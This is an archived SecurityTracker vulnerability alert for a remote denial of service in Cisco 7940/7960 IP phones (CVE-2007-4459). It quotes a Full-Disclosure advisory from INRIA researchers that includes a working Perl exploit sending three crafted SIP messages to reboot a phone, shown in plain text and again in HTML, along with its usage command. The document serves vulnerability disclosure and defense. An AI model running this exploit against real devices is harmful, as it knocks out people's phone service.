SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Device (VoIP/Phone/FAX)  >   Cisco IP Phones Vendors:   Cisco
Cisco 7940/7960 IP Phones Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1018591
SecurityTracker URL:  http://securitytracker.com/id/1018591
CVE Reference:   CVE-2007-4459   (Links to External Site)
Updated:  Aug 22 2007
Original Entry Date:  Aug 21 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): firmware version prior to 8.7(0)
Description:   A vulnerability was reported in the Cisco 7940/7960 IP Phones. A remote user can cause denial of service conditions.

A remote user can send a sequence of specially crafted messages to cause the target device to reboot.

A series of three SIP messages can cause the device to reboot due to a flaw in tracking SIP message state. The vendor was notified in March 2007.

A series of ten SIP messages can cause the device to reboot due to a flaw in the SIP stack. The vendor was notified in April 2007.

Cisco has assigned Cisco bug ID CSCsi68191 to this vulnerability.

Humberto J. Abdelnur, Radu State, and Olivier Festor discovered these vulnerabilities using the Madynes VoIP fuzzer KIPH.
Impact:   A remote user can cause the target device to reboot.
Solution:   The vendor has issued a fixed version (firmware 8.7(0)), available at:

http://www.cisco.com/pcgi-bin/tablebuild.pl/sip-ip-phone7960?psrtdcat20e2

The Cisco advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sr-20070821-sip.shtml
Vendor URL:  www.cisco.com/warp/public/707/cisco-sr-20070821-sip.shtml (Links to External Site)
Cause:   State error
Underlying OS:  

Message History:   None.

 Source Message Contents
Date:  Mon, 20 Aug 2007 15:57:44 +0200
Subject:  [Full-disclosure] 3 messsages attack remote DOS on Cisco 7940

This is a multi-part message in MIME format.

--===============0081161989==
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0052_01C7E342.D8D84FB0"

This is a multi-part message in MIME format.

------=_NextPart_000_0052_01C7E342.D8D84FB0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

MADYNES Security Advisory : stateful  SIP  remote DOS on  Cisco 7940

Date of Discovery 3 February, 2007

ID: KIPH5

Synopsis

After sending a series of three SIP messages the device reboots. The phone
does not check properly the state engine in the SIP stack
The vendor was informed  in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.

Background 

*	SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 


Affected devices: Cisco phone 7940 (maybe other also) running firmware
P0S3-08-6-00 

 

Impact 
A malicious user can remotely crash and perform a denial of service attack
by sending three  crafted SIP  messages. 

Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

Credits

*	Humberto J. Abdelnur (Ph.D Student)
*	Radu State (Ph.D)
*	Olivier Festor (Ph.D)


This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH

 


Configuration of our device:

*	Current Firmware :  P0S3-08-6-00 
*	IP-Address obtained by DHCP as 192.168.1.8 
*	User Name: 7940-1

Vulnerability:

It is based in a sequence of messages, any of the particular messages may do
any harm by itself, but all of them turn the device in an inconsistent
state. The sequence is like:

X ------------------------- INVITE -----------------------> Cisco
X <--- 481 transaction does not exists -----  Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------------- OK -------------------------  Cisco
X <--- 481 transaction does not exists -----  Cisco
X ------------------------- OPTIONS--------------------> Cisco

And the device reboots.

The INVITE sent has the particularity that the remote tag is already filled.
The following two OPTIONS messages must to have the same Call-ID as the
INVITE and the CSeq number must increment, otherwise the test does not work.


Exploit:

To run the exploit the file stateful-cisco-8.6.pl should be launched
(assuming our configurations) as:

perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1

The script is simple and does not check if which messages are received, but
just wait a second before send the next one.

 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=00\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10
INVITE\r\nContent-Length: 0\r\n\r\n";;

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=01\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=01\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=02\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=02\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

 


------=_NextPart_000_0052_01C7E342.D8D84FB0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" =
xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:st1=3D"urn:schemas-microsoft-com:office:smarttags" =
xmlns=3D"http://www.w3.org/TR/REC-html40">

<head>
<meta http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dus-ascii">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"PlaceType"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"PlaceName"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"place"/>
<!--[if !mso]>
<style>
st1\:*{behavior:url(#default#ieooui) }
</style>
<![endif]-->
<style>
<!--
 /* Font Definitions */
 @font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	margin-bottom:.0001pt;
	font-size:12.0pt;
	font-family:"Times New Roman";}
a:link, span.MsoHyperlink
	{color:blue;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{color:purple;
	text-decoration:underline;}
p
	{mso-margin-top-alt:auto;
	margin-right:0in;
	mso-margin-bottom-alt:auto;
	margin-left:0in;
	font-size:12.0pt;
	font-family:"Times New Roman";}
span.EmailStyle17
	{mso-style-type:personal-compose;
	font-family:Arial;
	color:windowtext;}
@page Section1
	{size:595.3pt 841.9pt;
	margin:70.85pt 70.85pt 70.85pt 70.85pt;}
div.Section1
	{page:Section1;}
 /* List Definitions */
 @list l0
	{mso-list-id:566767589;
	mso-list-template-ids:535710460;}
@list l0:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:.5in;
	mso-level-number-position:left;
	text-indent:-.25in;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
@list l1
	{mso-list-id:1640841892;
	mso-list-template-ids:-1691044848;}
@list l1:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:.5in;
	mso-level-number-position:left;
	text-indent:-.25in;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
ol
	{margin-bottom:0in;}
ul
	{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 9]><xml>
 <o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
 <o:shapelayout v:ext=3D"edit">
  <o:idmap v:ext=3D"edit" data=3D"1" />
 </o:shapelayout></xml><![endif]-->
</head>

<body lang=3DFR link=3Dblue vlink=3Dpurple>

<div class=3DSection1>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>MADYNES Security =
Advisory : stateful
&nbsp;SIP &nbsp;remote DOS on &nbsp;Cisco =
7940<o:p></o:p></span></font></p>

<p><b><font size=3D3 face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:
12.0pt;font-weight:bold'>Date of Discovery 3 =
February</span></font></b><span
lang=3DEN-US>, 2007<br>
<br>
<b><span style=3D'font-weight:bold'>ID: </span></b>KIPH5<br>
<br>
<b><span =
style=3D'font-weight:bold'>Synopsis</span></b><o:p></o:p></span></p>

<p><font size=3D3 face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>After
sending a series of three SIP messages the device reboots. The phone =
does not
check properly the state engine in the SIP stack<br>
The vendor was informed &nbsp;in March 2007 and acknowledged the =
vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first =
vulnerabilities
published where advanced state tracking is required.<br>
<br>
<b><span style=3D'font-weight:bold'>Background =
</span></b><o:p></o:p></span></font></p>

<ul type=3Ddisc>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l1 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt;
     color:windowtext'>SIP is the IETF standardized (RFCs 2543 and 3261)
     protocol for VoIP signalization. SIP is an ASCII based INVITE =
message is
     used to initiate and maintain a communication session. <br>
     <br>
     <br>
     <b><span style=3D'font-weight:bold'>Affected devices:</span></b> =
Cisco phone
     7940 (maybe other also) running firmware </span></font><span =
lang=3DEN-US>P0S3-08-6-00
     <o:p></o:p></span></li>
</ul>

<p><font size=3D3 face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p style=3D'margin-bottom:12.0pt'><b><font size=3D3 face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;font-weight:bold'>Impact <br>
</span></font></b><span lang=3DEN-US>A malicious user can remotely crash =
and
perform a denial of service attack by sending three &nbsp;crafted SIP =
&nbsp;messages.
<br>
<br>
<b><span style=3D'font-weight:bold'>Resolution<br>
</span></b>Fixed software will be available from the vendor and =
customers following
recommended best practices (ie segregating VOIP traffic from data) will =
be
protected from malicious traffic in most situations. <br>
<br>
<b><span =
style=3D'font-weight:bold'>Credits</span></b><o:p></o:p></span></p>

<ul type=3Ddisc>
 <li class=3DMsoNormal =
style=3D'mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo2'><font size=3D3 face=3D"Times New =
Roman"><span
     lang=3DEN-US style=3D'font-size:12.0pt'>Humberto J. Abdelnur (Ph.D =
Student)<o:p></o:p></span></font></li>
 <li class=3DMsoNormal =
style=3D'mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo2'><st1:place w:st=3D"on"><st1:PlaceName =
w:st=3D"on"><font
       size=3D3 face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>Radu</span></font></st1:PlaceName><span
      lang=3DEN-US> <st1:PlaceType =
w:st=3D"on">State</st1:PlaceType></span></st1:place><span
     lang=3DEN-US> (Ph.D)<o:p></o:p></span></li>
 <li class=3DMsoNormal =
style=3D'mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo2'><font size=3D3 face=3D"Times New =
Roman"><span
     lang=3DEN-US style=3D'font-size:12.0pt'>Olivier Festor =
(Ph.D)<o:p></o:p></span></font></li>
</ul>

<p><font size=3D3 face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'><br>
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer =
KIPH<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'><br>
Configuration of our device:<o:p></o:p></span></font></p>

<ul type=3Ddisc>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l1 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span style=3D'font-size:12.0pt'>Current =
Firmware
     :&nbsp; P0S3-08-6-00 <o:p></o:p></span></font></li>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l1 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>IP-Address
     obtained by DHCP as 192.168.1.8 <o:p></o:p></span></font></li>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l1 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span style=3D'font-size:12.0pt'>User =
Name: 7940-1<o:p></o:p></span></font></li>
</ul>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Vulnerability:<br>
<br>
It is based in a sequence of messages, any of the particular messages =
may do
any harm by itself, but all of them turn the device in an inconsistent =
state. The
sequence is like:<br>
<br>
X ------------------------- INVITE -----------------------&gt; Cisco<br>
X &lt;--- 481 transaction does not exists -----&nbsp; Cisco<br>
X ------------------------- OPTIONS--------------------&gt; Cisco<br>
X &lt;--------------------------- OK -------------------------&nbsp; =
Cisco<br>
X &lt;--- 481 transaction does not exists -----&nbsp; Cisco<br>
X ------------------------- OPTIONS--------------------&gt; Cisco<br>
<br>
And the device reboots.<br>
<br>
The INVITE sent has the particularity that the remote tag is already =
filled. The
following two OPTIONS messages must to have the same Call-ID as the =
INVITE and
the CSeq number must increment, otherwise the test does not work. <br>
<br>
Exploit:<br>
<br>
To run the exploit the file stateful-cisco-8.6.pl should be launched =
(assuming
our configurations) as:<br>
<br>
perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1<br>
<br>
The script is simple and does not check if which messages are received, =
but
just wait a second before send the next =
one.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>#!/usr/bin/perl<o:p></o:p></span><=
/font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>use =
IO::Socket::INET;<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>die &quot;Usage $0 =
&lt;dst&gt;
&lt;port&gt; &lt;username&gt;&quot; unless =
($ARGV[2]);<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>$socket=3Dnew
IO::Socket::INET-&gt;new(PeerPort=3D&gt;$ARGV[1],<o:p></o:p></span></font=
></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;
</span></font><font color=3Dblack><span lang=3DPT-BR =
style=3D'color:black'>Proto=3D&gt;'udp',<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;
PeerAddr=3D&gt;$ARGV[0]);<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>$msg =3D =
&quot;INVITE
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=3D00\r\nFrom:
&lt;sip:gasparin\@192.168.1.2&gt;;tag=3D00\r\nTo:
&lt;sip:$ARGV[2]\@$ARGV[0]&gt;;tag=3D00\r\nCall-ID: =
et\@192.168.1.2\r\nCSeq: 10
INVITE\r\nContent-Length: 0\r\n\r\n&quot;;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>$socket-&gt;send($msg);<o:p></o:p>=
</span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>sleep(1);<o:p></o:p></span></font>=
</p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>$msg =
=3D&quot;OPTIONS
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=3D01\r\nFrom:
&lt;sip:gasparin\@192.168.1.2&gt;;tag=3D01\r\nTo:
&lt;sip:$ARGV[2]\@$ARGV[0]&gt;\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>$socket-&gt;send($msg);<o:p></o:p>=
</span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>sleep(1);<o:p></o:p></span></font>=
</p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>$msg =
=3D&quot;OPTIONS
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=3D02\r\nFrom:
&lt;sip:gasparin\@192.168.1.2&gt;;tag=3D02\r\nTo:
&lt;sip:$ARGV[2]\@$ARGV[0]&gt;\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>$socket-&gt;send($msg);<o:p></o:p>=
</span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US =
style=3D'font-size:
10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

</div>

</body>

</html>

------=_NextPart_000_0052_01C7E342.D8D84FB0--


--===============0081161989==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0081161989==--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC